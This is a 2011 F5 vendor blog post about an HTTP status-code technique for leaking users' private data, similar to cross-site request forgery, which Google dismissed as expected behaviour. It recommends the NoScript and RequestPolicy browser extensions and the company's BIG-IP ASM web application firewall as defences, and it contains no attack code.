F5 Friday: Expected Behavior is not Necessarily Acceptable Behavior

Sometimes vulnerabilities are simply the result of a protocol design decision, but that doesn’t make it any less a vulnerability

An article discussing a new attack on social networking applications that effectively provides an opening through which personal data can be leaked was passed around the Internets recently.

If you haven’t read “Abusing HTTP Status Codes to Expose Private Information” yet please do, it’s a good read and exposes, if you’ll  pardon the pun, yet another “vulnerability by design” flaw that exists in many of the protocols that make the web go today.

We, as an industry, spend a lot of time picking on developers for not writing secure code, for introducing vulnerabilities and subsequently ignoring them, and for basically making the web a very scary place. We rarely, however, talk about the insecurities and flaws inherent in core protocols, however, that contribute to the overall scariness of the Internets. Consider, for example, the misuse and abuse of HTTP as a means to carry out a DDoS attack. Such attacks are not viable due to some developer with a lax attitude toward security, it’s simply the result of the way in which the protocol works. Someone discovered a way to put it to work to carry out their evil plans.

The same can be said of the aforementioned “vulnerability.” This isn’t the result of developers not caring about security, it’s merely a side-effect of the way in which HTTP is supposed to work. Site and application developers use HTTP status codes and the like to respond to requests in addition to the content returned. Some of those HTTP status codes aren’t even under the control of the site or application developer – 5xx errors are returned by the web or application server software automatically based on internal conditions.

That someone has found a way to leverage these basic behaviors in a way that might allow personal information to be exposed should be no surprise. The more complex web applications – and the interactions that make the “web” an actual “web” of interconnected sites and data stores – become, the more innovative use of admittedly very basic application protocols must be made. That innovation can almost always be turned around and used for more malevolent purposes. 

What was, troubling, however, was Google’s response to this “vulnerability” in Gmail as described by the author. The author states he “reported it to Google and they described it as "expected behaviour" and ignored it.” Now Google is right – it is expected behavior but that doesn’t necessarily mean it’s acceptable behavior.  

PROTECTING YOURSELF from BAD EXPECTED BEHAVIOR

Enabling protection against this potential exposure of personal information depends on whether you are a user or someone charged with protecting user’s information.

If you didn’t read through all the comments on the article then you missed a great suggestion for users interested in protecting themselves against what is similar to a cross-site request forgery (XSRF) attack. I’ll reproduce it here, in total, to make sure nothing is lost:

Justin Samuel

I'm the RequestPolicy developer. Thanks for the mention. I should point out that if you're using NoScript then you're already safe as long as you haven't allowed JavaScript on this or the other sites. Of course, people do allow JavaScript in some cases but still want control over cross-site requests. In those cases, NoScript + RequestPolicy is a great combo (it's what I use) if the usability impact of having two website-breaking, whitelist-based extensions installed is worth the security and privacy gains. RequestPolicy does have some good usability improvements planned, but if you can only stand to have one of these extensions installed, then I recommend NoScript over RequestPolicy in most situations.

Written, Tuesday January the 25th, 2011

So as a user, NoScript or NoScript and RequestPolicy will help keep you safe from the potential misuse of this “expected behavior” by giving you the means by which you can control cross-site requests.

As someone responsible for protecting your user/customer/partner/employee information, however, you can’t necessarily force the use of NoScript or RequestPolicy or any other client-side solution. First, it doesn’t protect the data from leaving the building in the first place and second, even if it did and you could force the installation/deployment of such solutions you can’t necessarily control user behavior that may lead to turning it off or otherwise manipulating the environment. The reality is that for organizations trying to protect both themselves and their customers, they have only one thing they can control – their own environment.

That means the data center.

PROTECTING YOUR CLIENTS FROM BAD EXPECTED BEHAVIOR

To prevent data leakage of any kind – whether through behavioral or vulnerability exploitation – you need a holistic security strategy in place. The funny thing about protocol behavior exploitation, however, is that application protocol behavior is governed by the stack and the platform, not necessarily the application itself.

Now in this case it’s true that the behavior is eerily similar to a cross-site request forgery (XSRF) attack. Which means developers could and probably should be able to address by enforcing policies that restrict access to specific requests based on referrer or other identifying – contextual – information.

The problem is that this means modifying applications for a potential vulnerability that may or may not be exploited. It’s unlikely to have the priority necessary to garner time and effort on the application development team’s already lengthy to-do list. Which is where a web application firewall (WAF) like BIG-IP ASM (Application Security Manager) comes into play. BIG-IP ASM can protect applications and sensitive data from attacks like XSRF right now. It doesn’t take nearly the cycles to implement an XSRF (or other web application layer security policy) using ASM as it will to address in the application itself (if that’s even possible – sometimes it’s not). Whether ASM or any WAF ends up permanently protecting data against exploitation or not is entirely up to the organization. In some cases it may be the most financially and architecturally efficient solution. In other cases it may not. In the former, hey great. In the latter, hey great – you’ve got a stop gap measure to protect data and customers and the organization until such time as a solution can be implemented, tested, and ultimately deployed.

Either way, BIG-IP ASM enables organizations to quickly address expected (but still unacceptable) behavior. That means risk is nearly immediately mitigated whether or not the long term solution remains the WAF or falls to developers. Customers don’t care about the political battles or religious wars that occur regarding the role of web application firewalls in the larger data center security strategy and they really don’t want to hear about “expected behavior” as the cause of a data leak.

They care that they are protected when using applications against inadvertent theft of their private, personal data. It’s the job of IT to do just that, one way or another.


AddThis Feed Button Bookmark and Share

Published Mar 11, 2011
Version 1.0

Was this article helpful?

No CommentsBe the first to comment